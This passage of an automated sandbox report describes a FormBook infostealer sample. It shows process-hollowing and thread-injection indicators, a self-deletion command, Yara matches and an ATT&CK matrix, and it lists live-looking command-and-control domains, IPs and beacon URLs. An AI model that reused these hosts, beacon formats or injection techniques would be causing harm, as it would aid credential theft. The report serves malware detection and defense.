          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04761DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_047B51BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_047B51BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_047B51BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_047B51BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_047661A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_047661A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_047635A1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_047B69A6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04762990 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_0476FD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_0476FD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_0476A185 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_0475C182 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04762581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04762581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04762581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04762581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04732D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04732D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04732D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04732D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04732D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_0475AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_0475AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_0475AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_0475AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_0475AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_0477927A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_0474766D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_047EB260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_047EB260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04800EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04800EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04800EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_047FEA55 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_047C4257 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04739240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04739240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04739240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04739240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04747E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04747E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04747E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04747E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04747E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04747E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_047FAE44 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_047FAE44 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_047EFE3F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_0473E620 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04808ED6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04774A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04774A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04735210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04735210 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04735210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04735210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_0473AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_0473AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04753A1C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_0476A61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_0476A61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_0473C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_0473C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_0473C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04768E00 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_047F1608 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04748A0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04762AE4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_047616E0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_047476E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04778EC7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_047636CC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04762ACB mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_047EFEC0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_0474AAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_0474AAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_0476FAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_047352A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_047352A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_047352A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_047352A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_047352A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_047B46A7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_0476D294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_0476D294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04808A62 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_047CFE87 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04763B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04763B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_0473DB60 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_0474FF60 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04805BA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_0473F358 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_0473DB40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_0474EF40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_0476E730 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04734F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04734F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_0475F716 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_047F131B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_047CFF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_047CFF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_0476A70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeProcess queried: DebugPort
          Source: C:\Windows\SysWOW64\cscript.exeProcess queried: DebugPort
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00409B50 LdrLoadDll,
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeMemory allocated: page read and write | page guard

          HIPS / PFW / Operating System Protection Evasion:

          barindex
          System process connects to network (likely due to code injection or exploit)Show sources
          Source: C:\Windows\explorer.exeNetwork Connect: 172.67.216.2 80
          Source: C:\Windows\explorer.exeDomain query: www.rdoi.top
          Source: C:\Windows\explorer.exeNetwork Connect: 156.240.150.22 80
          Source: C:\Windows\explorer.exeNetwork Connect: 18.118.119.183 80
          Source: C:\Windows\explorer.exeDomain query: www.isshinn1.com
          Source: C:\Windows\explorer.exeDomain query: www.sosoon.store
          Source: C:\Windows\explorer.exeDomain query: www.24000words.com
          Source: C:\Windows\explorer.exeDomain query: www.creationslazzaroni.com
          Source: C:\Windows\explorer.exeDomain query: www.healthyweekendtips.com
          Source: C:\Windows\explorer.exeNetwork Connect: 45.93.101.51 80
          Source: C:\Windows\explorer.exeDomain query: www.esyscoloradosprings.com
          Source: C:\Windows\explorer.exeNetwork Connect: 157.7.107.193 80
          Source: C:\Windows\explorer.exeDomain query: www.passiverewardssystems.com
          Source: C:\Windows\explorer.exeNetwork Connect: 108.167.135.122 80
          Source: C:\Windows\explorer.exeNetwork Connect: 203.170.80.253 80
          Source: C:\Windows\explorer.exeNetwork Connect: 34.102.136.180 80
          Source: C:\Windows\explorer.exeNetwork Connect: 104.233.161.241 80
          Source: C:\Windows\explorer.exeDomain query: www.megacinema.club
          Source: C:\Windows\explorer.exeDomain query: www.thedusi.com
          Sample uses process hollowing techniqueShow sources
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeSection unmapped: C:\Windows\SysWOW64\cscript.exe base address: 840000
          Maps a DLL or memory area into another processShow sources
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeSection loaded: unknown target: C:\Windows\SysWOW64\cscript.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeSection loaded: unknown target: C:\Windows\SysWOW64\cscript.exe protection: execute and read and write
          Source: C:\Windows\SysWOW64\cscript.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read write
          Source: C:\Windows\SysWOW64\cscript.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Queues an APC in another process (thread injection)Show sources
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeThread APC queued: target process: C:\Windows\explorer.exe
          Modifies the context of a thread in another process (thread injection)Show sources
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeThread register set: target process: 3352
          Source: C:\Windows\SysWOW64\cscript.exeThread register set: target process: 3352
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeProcess created: C:\Users\user\Desktop\CtTYTpaAKA.exe C:\Users\user\Desktop\CtTYTpaAKA.exe
          Source: C:\Windows\SysWOW64\cscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\CtTYTpaAKA.exe'
          Source: explorer.exe, 00000007.00000000.312038510.00000000011E0000.00000002.00020000.sdmp, cscript.exe, 0000000A.00000002.559531956.0000000002FC0000.00000002.00020000.sdmpBinary or memory string: Program Manager
          Source: explorer.exe, 00000007.00000000.311724441.0000000000B68000.00000004.00000020.sdmpBinary or memory string: Progman\Pr
          Source: explorer.exe, 00000007.00000000.312038510.00000000011E0000.00000002.00020000.sdmp, cscript.exe, 0000000A.00000002.559531956.0000000002FC0000.00000002.00020000.sdmpBinary or memory string: Shell_TrayWnd
          Source: explorer.exe, 00000007.00000000.312038510.00000000011E0000.00000002.00020000.sdmp, cscript.exe, 0000000A.00000002.559531956.0000000002FC0000.00000002.00020000.sdmpBinary or memory string: Progman
          Source: explorer.exe, 00000007.00000000.312038510.00000000011E0000.00000002.00020000.sdmp, cscript.exe, 0000000A.00000002.559531956.0000000002FC0000.00000002.00020000.sdmpBinary or memory string: Progmanlock
          Source: explorer.exe, 00000007.00000000.320927407.0000000008778000.00000004.00000001.sdmpBinary or memory string: Shell_TrayWndh
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeQueries volume information: C:\Users\user\Desktop\CtTYTpaAKA.exe VolumeInformation
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

          Stealing of Sensitive Information:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 5.2.CtTYTpaAKA.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.0.CtTYTpaAKA.exe.400000.4.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.0.CtTYTpaAKA.exe.400000.8.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.2.CtTYTpaAKA.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.0.CtTYTpaAKA.exe.400000.6.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.0.CtTYTpaAKA.exe.400000.6.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.0.CtTYTpaAKA.exe.400000.8.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.CtTYTpaAKA.exe.3b15be0.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.CtTYTpaAKA.exe.3acb9c0.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000007.00000000.325485769.000000000FAD4000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.353978087.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.354912343.00000000012B0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000000.341621895.000000000FAD4000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000002.557056820.0000000000150000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.296512785.00000000039A9000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000000.293661592.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000002.557804622.00000000007B0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000000.293144075.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000002.557379114.00000000005B0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.354450350.0000000000F40000.00000040.00020000.sdmp, type: MEMORY

          Remote Access Functionality:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 5.2.CtTYTpaAKA.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.0.CtTYTpaAKA.exe.400000.4.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.0.CtTYTpaAKA.exe.400000.8.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.2.CtTYTpaAKA.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.0.CtTYTpaAKA.exe.400000.6.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.0.CtTYTpaAKA.exe.400000.6.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.0.CtTYTpaAKA.exe.400000.8.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.CtTYTpaAKA.exe.3b15be0.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.CtTYTpaAKA.exe.3acb9c0.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000007.00000000.325485769.000000000FAD4000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.353978087.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.354912343.00000000012B0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000000.341621895.000000000FAD4000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000002.557056820.0000000000150000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.296512785.00000000039A9000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000000.293661592.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000002.557804622.00000000007B0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000000.293144075.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000002.557379114.00000000005B0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.354450350.0000000000F40000.00000040.00020000.sdmp, type: MEMORY

          Mitre Att&ck Matrix

          Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
          Valid AccountsShared Modules1Path InterceptionProcess Injection512Masquerading1OS Credential DumpingSecurity Software Discovery221Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
          Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsDisable or Modify Tools1LSASS MemoryProcess Discovery2Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothIngress Tool Transfer3Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
          Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Virtualization/Sandbox Evasion31Security Account ManagerVirtualization/Sandbox Evasion31SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Application Layer Protocol3Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
          Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Process Injection512NTDSRemote System Discovery1Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol13SIM Card SwapCarrier Billing Fraud
          Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptDeobfuscate/Decode Files or Information1LSA SecretsSystem Information Discovery112SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
          Replication Through Removable MediaLaunchdRc.commonRc.commonObfuscated Files or Information3Cached Domain CredentialsSystem Owner/User DiscoveryVNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
          External Remote ServicesScheduled TaskStartup ItemsStartup ItemsSoftware Packing11DCSyncNetwork SniffingWindows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
          Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobFile Deletion1Proc FilesystemNetwork Service ScanningShared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 510401 Sample: CtTYTpaAKA.exe Startdate: 27/10/2021 Architecture: WINDOWS Score: 100 31 www.qywyfeo8.xyz 2->31 33 www.mask60.com 2->33 35 mask60.com 2->35 43 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->43 45 Found malware configuration 2->45 47 Malicious sample detected (through community Yara rule) 2->47 49 7 other signatures 2->49 11 CtTYTpaAKA.exe 3 2->11         started        signatures3 process4 file5 29 C:\Users\user\AppData\...\CtTYTpaAKA.exe.log, ASCII 11->29 dropped 61 Tries to detect virtualization through RDTSC time measurements 11->61 15 CtTYTpaAKA.exe 11->15         started        signatures6 process7 signatures8 63 Modifies the context of a thread in another process (thread injection) 15->63 65 Maps a DLL or memory area into another process 15->65 67 Sample uses process hollowing technique 15->67 69 Queues an APC in another process (thread injection) 15->69 18 explorer.exe 15->18 injected process9 dnsIp10 37 www.rdoi.top 104.233.161.241, 49786, 80 PEGTECHINCUS United States 18->37 39 www.sosoon.store 18.118.119.183, 49811, 80 MIT-GATEWAYSUS United States 18->39 41 11 other IPs or domains 18->41 51 System process connects to network (likely due to code injection or exploit) 18->51 22 cscript.exe 18->22         started        signatures11 process12 signatures13 53 Self deletion via cmd delete 22->53 55 Modifies the context of a thread in another process (thread injection) 22->55 57 Maps a DLL or memory area into another process 22->57 59 Tries to detect virtualization through RDTSC time measurements 22->59 25 cmd.exe 1 22->25         started        process14 process15 27 conhost.exe 25->27         started       

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.

          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          SourceDetectionScannerLabelLink
          CtTYTpaAKA.exe13%VirustotalBrowse

          Dropped Files

          No Antivirus matches

          Unpacked PE Files

          SourceDetectionScannerLabelLinkDownload
          5.0.CtTYTpaAKA.exe.400000.4.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          5.2.CtTYTpaAKA.exe.400000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          5.0.CtTYTpaAKA.exe.400000.6.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          5.0.CtTYTpaAKA.exe.400000.8.unpack100%AviraTR/Crypt.ZPACK.GenDownload File

          Domains

          SourceDetectionScannerLabelLink
          megacinema.club0%VirustotalBrowse

          URLs

          SourceDetectionScannerLabelLink
          http://www.isshinn1.com/fqiq/?7ntl=P0DdOFE&t4=e+AZlQHvj0Nkc3ZxJNwaiuJVmPOcAOQ1LYKBIXTaam/aWkR0DWWiTlTQ8bI2AJlImQfa0%Avira URL Cloudsafe
          http://www.thedusi.com/fqiq/?7ntl=P0DdOFE&t4=t9SsZ/MS+FgAljVT/evJl5FFrjjg4DD8GLJQPa9p2h0JK2Hk2yZve+gJxH10C5UF88V/0%Avira URL Cloudsafe
          www.esyscoloradosprings.com/fqiq/0%Avira URL Cloudsafe
          http://www.passiverewardssystems.com/fqiq/?t4=S7zufRYckdaRFFMeU2i8sPw6oODMRAGo5BePfs9LVZnwdcptwuHxEcdCnQUJ/1YT2L5I&7ntl=P0DdOFE0%Avira URL Cloudsafe
          http://www.megacinema.club/fqiq/?7ntl=P0DdOFE&t4=VbjQ+CrtVqSc6MjyqwiIrbcVi4OLgBoaswazXZOO5Xcx+UM7PWGlfM9NMvQxrE1YfGIg0%Avira URL Cloudsafe
          http://www.24000words.com/fqiq/?t4=iMQAtVYJ5rSxYH2x6+rXrM9PD6xR/OhOVeuwgCEnac3/UPHz+dInplYvIFxL5JBy9ykq&7ntl=P0DdOFE0%Avira URL Cloudsafe
          http://www.rdoi.top/fqiq/?t4=DrMAfIISwi8U79fOFtAc8vb7WUYlKccaGhxOihVWZlb0OyUiTIjpechuj+pZJYn+REB0&7ntl=P0DdOFE0%Avira URL Cloudsafe
          http://www.sosoon.store/fqiq/?7ntl=P0DdOFE&t4=37G2EJO5ajdFCPilMv01MVSoTtyG1cwu/oJiLg0B75A/3Z+IhDAr8cszuRbw5Svr7Hw70%Avira URL Cloudsafe
          http://www.healthyweekendtips.com/fqiq/?7ntl=P0DdOFE&t4=nFNrhldUoBq3vLmHBw1UbSwwpktYb/50pHGi08ob/NjKnaohHgqGQwabDGB1W4+ZaPC+0%Avira URL Cloudsafe
          http://www.collada.org/2005/11/COLLADASchema9Done0%URL Reputationsafe
          http://www.esyscoloradosprings.com/fqiq/?t4=KZhYdxsAX/C25xiOpksKfhNe7DL7yKRLCy2J/73TfqSfqYhWOiYMofna8PStfGU22/Dk&7ntl=P0DdOFE0%Avira URL Cloudsafe

          Domains and IPs

          Contacted Domains

          NameIPActiveMaliciousAntivirus DetectionReputation
          www.passiverewardssystems.com
          203.170.80.253
          truetrue
            unknown
            www.rdoi.top
            104.233.161.241
            truetrue
              unknown
              megacinema.club
              45.93.101.51
